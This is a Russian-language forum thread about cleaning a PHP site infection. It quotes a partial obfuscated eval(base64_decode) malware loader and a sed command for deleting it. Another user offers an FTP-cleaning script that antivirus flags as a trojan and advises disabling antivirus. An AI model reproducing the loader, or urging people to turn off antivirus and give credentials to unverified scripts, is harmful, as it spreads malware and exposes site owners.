Регулярка для поиска вируса в файлах

Roman777

Roman777

Постоялец
Регистрация
29 Мар 2007
Сообщения
137
Реакции
19
Вот этот текст нужно найти в нескольких файлах, прошу помочь:

Код: 
<?php /*versio:1.12*/if (!defined ("determinator")){eval(base64_decode('ZnVuY3Rpb24gdVAxUFFvWmZhZXpHN0xDSWVIek10OTczZ0RJZ2NnbDlQbWNmU0VkTkRMUUJoWGg4T2E1MEY0bGg0SDIwb0NGcSgkcWwxNk9HQTNRZkl2MlFYSjZkSEF1ZzhKbWZyRXBhaURjcm1FRnJPZFRWVFNnUjFDb0pmQVVRUDNqR3pORVV4bCl7cmV0dXJuIGV2YWwoJHFsMTZPR0EzUWZJdjJRWEo2ZEhBdWc4Sm1mckVwYWlEY3JtRUZyT2RUVlRTZ1IxQ29KZkFVUVAzakd6TkVVeGwpO307ZnVuY3Rpb24gaG9lMTdwcDRRYkVYZkZlU0dkTFZaWG5yMFFwWmY0aE5qc
******
uP1PQoZfaezG7LCIeHzMt973gDIgcgl9PmcfSEdNDLQBhXh8Oa50F4lh4H20oCFq(eAfB2fdUQJEPPSFaqmnBmoh2xoHevgsmQJD1dadgRBR7qsjNgeOGT86laLloLE1l(hoe17pp4QbEXfFeSGdLVZXnr0QpZf4hNjsIbvP9FBDURhQX9raGaJVdEHdJzsq7o(\$cjULv3a3LSpp9LT13Ffq3AeTimxeCjim8qCm1U0zObFc1zOfHx5G5M9Zi6xgt0T9))); ");}?>

найти нужно именно вместе со строками <?php ?>
заранее спасибо и благодарность

хорошо помогает вот такой вариант - удаляет все лишнее:

find . -name \*.php -exec sed -i -r '/determinator/d' {} \;
но он удаляет сразу все строки с вирусом, а мне нужно оставить <?php в первой строке
 
Последнее редактирование:
Когда-то давно, когда я еще сохранял пароли от FTP в TotalCommander (наивный), так вышло, что все сайты что были там - заразились)))
В последствии написал скрипт для обхода по папкам ФТП и чистки сего мусора (прикрепил к сообщению).

Мануал:
1. Делаем !BACKUP! всех файлов перед применением!
2. Если надо добавить известные сигнатуры, редактируем файл ftped.php, переменная $_SIGN.
3. Заливаем на сторонний сервер (не туда где надо чистить, чтоб скрипт сам себя не почистил)
4. Открываем {host}/ftped/ftped.php, вводим данные и нажимаем "Пуск!"

В конце редактирования, бэкапы всех отредактированных файлов будут сохранены в папке удаленного сервера /_backup_ftp_parse

Скриншет:
screenshot.png
 

Вложения

  • ftped.7z
    375,1 KB · Просмотры: 12
denik написал(а):
Когда-то давно, когда я еще сохранял пароли от FTP в TotalCommander (наивный), так вышло, что все сайты что были там - заразились)))
В последствии написал скрипт для обхода по папкам ФТП и чистки сего мусора (прикрепил к сообщению).

Мануал:
1. Делаем !BACKUP! всех файлов перед применением!
2. Если надо добавить известные сигнатуры, редактируем файл ftped.php, переменная $_SIGN.
3. Заливаем на сторонний сервер (не туда где надо чистить, чтоб скрипт сам себя не почистил)
4. Открываем {host}/ftped/ftped.php, вводим данные и нажимаем "Пуск!"

В конце редактирования, бэкапы всех отредактированных файлов будут сохранены в папке удаленного сервера /_backup_ftp_parse

Скриншет:
Посмотреть вложение 51563
Нажмите для раскрытия...
Антивирус пишет, что это троян (Угроза JS/Kryptik.ВМ). Может ли еще кто-то проверить?
 
Roman777 написал(а):
Антивирус пишет, что это троян (Угроза JS/Kryptik.ВМ). Может ли еще кто-то проверить?
Нажмите для раскрытия...
естественно он так пишет))) там же сигнатуры перечислены (переменная $_SIGN) :)
более того, антивирус надо даже выключить!
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху